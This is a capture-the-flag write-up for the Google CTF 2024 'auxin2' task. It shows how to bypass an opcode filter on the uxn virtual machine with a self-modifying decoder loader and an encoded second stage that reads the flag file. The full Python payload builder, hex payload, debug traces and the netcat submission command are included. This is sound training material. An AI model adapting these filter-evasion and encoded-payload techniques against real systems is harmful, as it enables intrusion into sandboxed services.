Google CTF 2024 Quals – auxin2
Rustam Guseinov
Chairman of the cooperative RAD KOP
Well, we are finishing the experimental series of materials on CTF with the last article based on the recent Google event. Even the largest companies do not disdain to organize such events, and this is not only a great opportunity for training and professional growth, but also a good way of networking, career development or onboarding into the desired company. The case when the pleasant is combined with the useful and forms a dialectical whole, removing any private contradictions. Let's start analyzing the case?
Links to solutions to CTF tournament problems
The auxin2, which was placed in the “bowls” by the organizers, turned out to be a curious task from the category of esoteric programming – in this case, a virtual system Varvaraworking on the machine uxn. During the competition I managed to solve it first (as part of MSLC), although it took most of the first day – the conditions were fairly straightforward, but understanding the peculiarities of an unfamiliar machine's instruction set and working around the limitations was more than interesting for a detailed description of the solution.
Terms and Conditions
In the task archive we are given an image for varvara and a simple service that passes it a line with a length limit of 112 bytes and gives its output to the console – in addition, execution cannot take more than 0.5 seconds. Scrolling through the description uxn
we find out that this is a stack machine with two cyclic stacks, which does not use registers as such, and communicates with virtual peripheral devices (including the console and file system we need, in which – in the file flag
– the flag is located) through a special page of memory, inaccessible to standard instructions (special input-output instructions are used for this DEI
And DEO
). The instruction set is quite minimalistic – there is not even a decrement, but most have variants that work on two-byte words (suffix 2
), an alternative stack used to return from functions (suffix r
), and leaving used instructions in memory instead of removing them from the stack (suffix k
) – this is determined by the flags in the top three bits of the opcode byte (details).
Analysis
The easiest way to disassemble an image is to assemble it in addition to the image itself. uxn
(from what is specified in the description commit) utility image uxndis
from repository uxn-utils and using it on the file:
$ uxncli uxndis.rom auxin2.rom
You don't have to look too deeply into the short output to notice the byte checks in the loop for equality of the lower nibbles (four bits) 0
, 2
, 3
, 6
, 7
or e
:
...
0069: 06 DUP
006a: 80 0f LIT 0f
006c: 1c AND
006d: 06 DUP
006e: 80 00 LIT 00
0070: 08 EQU
0071: 20 00 34 JCI +52
0074: 06 DUP
0075: 80 02 LIT 02
0077: 08 EQU
0078: 20 00 2d JCI +45
007b: 06 DUP
007c: 80 03 LIT 03
007e: 08 EQU
007f: 20 00 26 JCI +38
0082: 06 DUP
0083: 80 06 LIT 06
0085: 08 EQU
0086: 20 00 1f JCI +31
0089: 06 DUP
008a: 80 07 LIT 07
008c: 08 EQU
008d: 20 00 18 JCI +24
0090: 06 DUP
0091: 80 0e LIT 0e
0093: 08 EQU
0094: 20 00 11 JCI +17
0097: 02 POP
...
The guess that the bytes of the sent code are checked in this way turns out to be correct:
$ nc auxin2.2024.ctfcompetition.com 1337
== proof-of-work: disabled ==
input: f1
timeout!
$ nc auxin2.2024.ctfcompetition.com 1337
== proof-of-work: disabled ==
input: f2
b'No.\n'
This means that our task is reduced to writing code without opcodes ending with the above nibbles. Let's look at uxn opcode table:
As we can see, opcodes are not available to us. LDZ
, JCI
, JMI
, JCI
, LIT
, POP
, LDR
, NIP
, STR
, DUP
, DEI
, OVR
, DEO
, JSR
And EOR
. Since according to the task conditions we need to read the flag from the file (and output it to the console), and access to devices requires use DEI
/DEO
it is clear that one way or another we will have to somehow hide these instructions, which means the code must be self-modifying – first we need to write a loader for the actual combat, second stage of the exploit.
The first stage is the decoding loader.
Having thought through possible methods of coding the second stage, for the duration of the competition I decided that the most suitable in this case might be a simple decomposition of the instructions into pairs of terms – fortunately, we have access to the opcode ADD
and we can select valid values for any instruction we need. Let's think about the most obvious problems first.
Review of limitations and initial state
The only jumps allowed are unconditional JMP
and conditional JCN
; since the instructions have been removed LIT
(effectively pushing the subsequent literal onto the stack) and POP
as well as copying DUP
And OVR
stack manipulation appears to be limited to the use of SWP
swapping the first and second elements of the stack (and SWP2
for two-byte words), ROT
which rotates the first three elements cyclically, and -k variants of other possible opcodes that allow the instruction bytes not to be removed from the stack after execution. Since LDZ
And LDR
loading from memory remains possible only with the help of LDA
by absolute address; in addition, due to the absence of LIT
it won't be so easy for us to put arbitrary values on the stack.
Having generously supplied the instruction handler in src/uxn.c
debug prints to be aware of the state of the stack and the executable code, we find out that the sent code gets into memory at the address 0x1d0
and starts to be executed from there (for testing we will send it to the input 01
– INC
):
$ uxncli auxin2.rom 01
...
pc=1d0, i=37 T=2 N=c2 L=1 X=4 Y=2 Z=2
DEO2 1d29aad0, 2, c2, 1
pc=1d1, i=1 T=4 N=2 L=2 X=0 Y=0 Z=0
INC
pc=1d2, i=0 T=5 N=2 L=2 X=0 Y=0 Z=0
BRK
(i
here shows the numerical value of the opcode, “registers” T/N/L/X/Y/Z
actually represent the first six bytes of the stack, and the counter pc
due to technical reasons it is lagging behind by a byte)
Location of the second stage
Since from the instructions that read memory, we only have access to the one that works with absolute values LDA
we must determine in advance the address at which the second stage will be located, and be able to easily put it on the stack to work with forked bytes.
Seeing the initial state of the stack above L=2 X=0
for convenience, let's imagine that we can fit the bootloader into 0x200
– 0x1d0
that is, 48 bytes – such a task looks feasible, and if we fail, we can adjust this offset later. With “registers” in such values, we can easily get the address we need for the future jump 0x200
– for example, opcode EQU
(0x08
) can compare 0x4
And 0x2
removing them from the stack and putting the result of the comparison on it 0x0
having formed the ones we need for LDA
T=0 N=2
:
$ uxncli auxin2.rom 08
...
pc=1d1, i=8 T=4 N=2 L=2 X=0 Y=0 Z=0
EQU
pc=1d2, i=0 T=0 N=2 L=0 X=0 Y=0 Z=0
BRK
Preparing the required variables
It is clear that to decode the second stage we will need a cycle for sequential data processing one way or another; the only conditional jump instruction available to us for this is JCN
and to use it we need either an absolute address in two-byte mode JCN2
or a later calculated relative value in one byte. Let's assume the second – we can place the desired byte, whatever it may be (remembering, however, that it must also pass the lower nibbles check), at the beginning of the second stage, load it and save it in a convenient (i.e. easily formed on the stack without using LIT
) to a memory address for future use – it's clear that with our limitations, keeping it available on the stack without this will be very difficult.
For this we could simply use 0x0
but, remembering that we will need one more variable, and a two-byte one at that – the incremented address of the result of adding two bytes of the second stage – we will take 0x2
and we will reserve 0x0
for the address of the decoded byte.
How to get a guaranteed and fairly concise stack 0x0
And 0x2
? For example, by placing two obviously unequal bytes on it using INCk
INCk
and then comparing them – EQU
will give us 0x0
A NEQ
– 0x1
which, of course, can be turned into 0x2
with the help of one INC
.
Well, let's download it from 0x200
jump variable (while the default zero will be there) and save it at the address 0x2
using the most obvious instruction for this – STZ
designed specifically for writing to the first 256 bytes of memory:
EQU
LDAk (k оставит адрес 0x200 на стеке)
INCk
INCk
NEQ
INC
STZ
Let's check the result:
$ uxncli auxin2.rom 08948181090111
...
pc=1d1, i=8 T=4 N=2 L=2 X=2 Y=2 Z=2
EQU
pc=1d2, i=94 T=0 N=2 L=2 X=2 Y=2 Z=2
LDA
LDA 0 = ram[200]
pc=1d3, i=81 T=0 N=0 L=2 X=2 Y=2 Z=2
INC
pc=1d4, i=81 T=1 N=0 L=0 X=2 Y=2 Z=2
INC
pc=1d5, i=9 T=2 N=1 L=0 X=0 Y=2 Z=2
NEQ
pc=1d6, i=1 T=1 N=0 L=0 X=2 Y=2 Z=2
INC
pc=1d7, i=11 T=2 N=0 L=0 X=2 Y=2 Z=2
STZ
STZ ram[2] = 0
pc=1d8, i=0 T=0 N=2 L=2 X=2 Y=2 Z=2
BRK
Everything looks correct, and the address of the second stage is on top of the stack, allowing us to immediately load it into 0x0
– the same, because we can easily write decoded bytes directly over the already read bytes of the second stage – with the help of
INCk
INCk
EQU
STZ2k (2 - сохраняем два байта, и k - оставляем их на стеке)
Moreover, since, unlike LDAk
, STZk
will leave the save address on top of the stack – 0x0
we need to “unfold” it in such a way that it is replaced by the decoder address counter lying behind it – for this, the double will work ROT
:
...
STZ2
STZ2 ram[0,1] = 2,200
pc=1dc, i=5 T=0 N=0 L=2 X=2 Y=2 Z=2
ROT
pc=1dd, i=5 T=2 N=0 L=0 X=2 Y=2 Z=2
ROT
pc=1de, i=0 T=0 N=2 L=0 X=2 Y=2 Z=2
BRK
Decoder cycle
The next steps are pretty obvious – we need to shift the decoder counter, load a byte onto the stack, and repeat this operation so that the loaded bytes end up on top of the stack, ready to be added using ADD
. Looking at the state of the stack in debugging, we get the following code:
INC2
LDAk
ROT
ROT
INC2
LDAk
ROT
ROT
SWP2
ADD
It looks like (for now on empty values of the second stage) this actually works:
...
LDA
LDA 0 = ram[201]
pc=1e2, i=5 T=0 N=1 L=2 X=0 Y=2 Z=2
ROT
pc=1e3, i=5 T=2 N=0 L=1 X=0 Y=2 Z=2
ROT
pc=1e4, i=21 T=1 N=2 L=0 X=0 Y=2 Z=2
INC2
pc=1e5, i=94 T=2 N=2 L=0 X=0 Y=2 Z=2
LDA
LDA 0 = ram[202]
pc=1e6, i=5 T=0 N=2 L=2 X=0 Y=0 Z=2
ROT
pc=1e7, i=5 T=2 N=0 L=2 X=0 Y=0 Z=2
ROT
pc=1e8, i=24 T=2 N=2 L=0 X=0 Y=0 Z=2
SWP2
pc=1e9, i=18 T=0 N=0 L=2 X=2 Y=0 Z=2
ADD
pc=1ea, i=0 T=0 N=2 L=2 X=0 Y=2 Z=2
BRK
It's time to load our decoded byte dump address variable from 0x0
put the result at this address, increment it and return it to its place. LDZ
is not available to us, so we will have to form the full address on the stack for LDA2
that is 0x0 0x0
. For this you can use here LTH
in addition to the already familiar sequence:
INCk INCk EQU LTH LDA2 - загрузка адреса
STAk - выгрузка декодированного байта
INC2 - инкрементируем переменную
INCk INCk EQU STZ2 - выгрузка адреса
Let's return the jump variable from the stack 0x2
in the same way:
INCk INCk EQU LTH INC INC LDA
And we use it for JCN
– after our manipulations, the decoded byte ends up exactly in the place of the condition, therefore, if the bytes of the second stage are added up in 0x0
(For example, 0xff01
), the cycle will be interrupted and execution will go beyond the first stage.
JCN
Final amendments
Having looked at the result, however, we note that after the jump, we need to jump to the beginning of the cycle INC2 LDAk ROT ROT
– we need to return the decoder address counter to its place using SWP2
. Because this needs to be done only after the jump, we can place in front INC2
two swaps – SWP2 SWP2
which will keep the stack as is in the first iteration, but will allow us to do what we intended by jumping to the second SWP2
.
So, let's assemble the final version of the first stage in Python:
code = "0894" # EQU (prepare 0200), LDAk - load jump back value
code += "8181090111" # INCk INCk NEQ INC STZ, store jump back value to 0x02
code += "818108b1" # INCk INCk EQU STZ2k, store start address to 0x00
code += "0505" # ROT ROT
code += "24" # SWP2
code += "24" # SWP2 - not doing anything first go, swaps when we jump in between the instructions
code += "21" # INC2 addr
code += "94" # LDAk
code += "0505" # ROT ROT
code += "21" # INC2 addr
code += "94" # LDAk
code += "0505" # ROT ROT
code += "24" # SWP2
code += "18" # ADD
code += "8181088b34" # INCk INCk EQU LTH LDA2, load start address from 0x00
code += "95" # STAk, store the decoded byte
code += "21" # INC2 addr
code += "81810831" # INCk INCk EQU STZ2, store start address to 0x00
code += "8181088b010114" # INCk INCk EQU LTH INC INC LDA, load jump back value from 0x02
code += "0d" # JCN - if new value is 00, continue (need to mark the end of the payload with e.g. ff01)
Having checked the size of the code, we find that we guessed right with the size – the bootloader fits into 44 bytes. Fill the rest up to 0x200
we can, for example, padding the place from SWP
– 0x04
.
Having calculated and checked the jump offset, we find out that we need a value that suits our conditions. 0xe1
– that's nice too! Besides, the instruction corresponding to this byte doesn't do anything terrible – it's INC2kr
without even touching the regular stack. Let's add padding to the code and 0xe1
:
pad_len = 0x200 - 0x1d0 - len(code)//2
full = code + ("04" * pad_len) + "e1"
Adding to this temporarily 0xff01
and looking at the debug output, we make sure that the loop is interrupted correctly:
$ uxncli auxin2.rom 08948181090111818108b105052424219405052194050524188181088b349521818108318181088b0101140d04040404e1ff01
...
pc=1fc, i=d T=e1 N=0 L=2 X=2 Y=0 Z=2
JCN
pc=1fd, i=4 T=2 N=2 L=0 X=2 Y=2 Z=2
SWP
pc=1fe, i=4 T=2 N=2 L=0 X=2 Y=2 Z=2
SWP
pc=1ff, i=4 T=2 N=2 L=0 X=2 Y=2 Z=2
SWP
pc=200, i=4 T=2 N=2 L=0 X=2 Y=2 Z=2
SWP
pc=201, i=0 T=2 N=2 L=0 X=2 Y=2 Z=2
BRK
Time to move on to stage two!
The second stage is reading and outputting the flag.
Given the total limit of 112 bytes, the 51 of which have already been used, and the fact that all subsequent instructions will take up twice as much space due to our decoding method, we are left with 30 bytes of possible payload. Let's think about what is required of us: in order to access the file system, we need to store the file name somewhere flag
; it is necessary, judging by her descriptiontransfer to the correct addresses of the device pages via DEO
the address of this name, the desired buffer length and the output address; you need to output to the loop console bytes of the read flag.
File name
The most logical thing would be to place the line flag
at the end; we'll know its absolute address when we're done writing the code, so for now we'll load a dummy onto the stack using LIT2
:
LIT2 ff ff
...
66 6c 61 67 - flag
Working with a file
Let's upload the received address to the address file name
– 0xa8
:
LIT a8
DEO2k - оставим аргументы на стеке
By increasing the call address to 0xaa
let's load the length – the same string address will do for us as the length flag
since the meaning 0x2xx
will give us more than enough bytes:
INC INC - 0xaa и адрес строки на стеке
DEO2k
Finally, we force the system to write the read flag over the same line (0xac
):
INC INC - 0xac и адрес строки на стеке
DEO2k
Let's return the address to the top of the stack – now we don't need it for this ROT ROT
:
POP
Output to console
All we have to do is set up a simple loop, calculating (or selecting) the relative jump offset. We can leave it running, since the service will still give us the console output after a half-second timeout:
LDAk - загрузим байт флага на стек
LIT 18 - адрес вывода байта на консоль
DEO - вывод
INC2 - следующий байт
LIT f8 - отрицательный оффсет
JMP
Finalization
Having calculated the address of the string flag
we'll put it in its place and finish building the exploit, breaking the bytes into suitable pairs – they're easy to pick up manually:
payload = ""
payload += "9f01" # a0 LIT2
payload += "0101" # 02
payload += "1401" # 15
payload += "7f01" # 80 LIT
payload += "9f09" # a8
payload += "af08" # b7 DEO2k # a8 file name
payload += "fd04" # 01 INC
payload += "fd04" # 01 INC
payload += "af08" # b7 DEO2k # aa file length
payload += "fd04" # 01 INC
payload += "fd04" # 01 INC
payload += "af08" # b7 DEO2k # ac file read
payload += "0101" # 02 POP
payload += "8f05" # 94 LDAk
payload += "7f01" # 80 LIT
payload += "1404" # 18
payload += "0f08" # 17 DEO
payload += "1d04" # 21 INC2 - next byte
payload += "7f01" # 80 LIT
payload += "ef09" # f8
payload += "010b" # 0c JMP
payload += "6105" # f
payload += "610b" # l
payload += "5d04" # a
payload += "5d0a" # g
full += payload + "ff01"
print(full)
Let's send the generated line to the server:
$ echo $(python3 sol.py) | nc auxin2.2024.ctfcompetition.com 1337
== proof-of-work: disabled ==
input: timeout!
b'CTF{Sorry__n0_Music_thi5_t1m3}\n\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
All that remains is to hand over the received flag and enjoy the victory.
Conclusion
A successful mix with a clear goal and a real (albeit rather toy) machine at its core, forcing you to tinker with the choice of payload packing strategy and requiring some codegolfing in an unfamiliar assembler; however, I didn't feel particularly constrained – both stages fit into the limit without any special reductions relative to the original idea (in the comments to the service it is indicated that the author's solution took up 91 bytes – ours takes up 101, although in places it can be reduced without changing the idea due to some tricks and additional stack massage).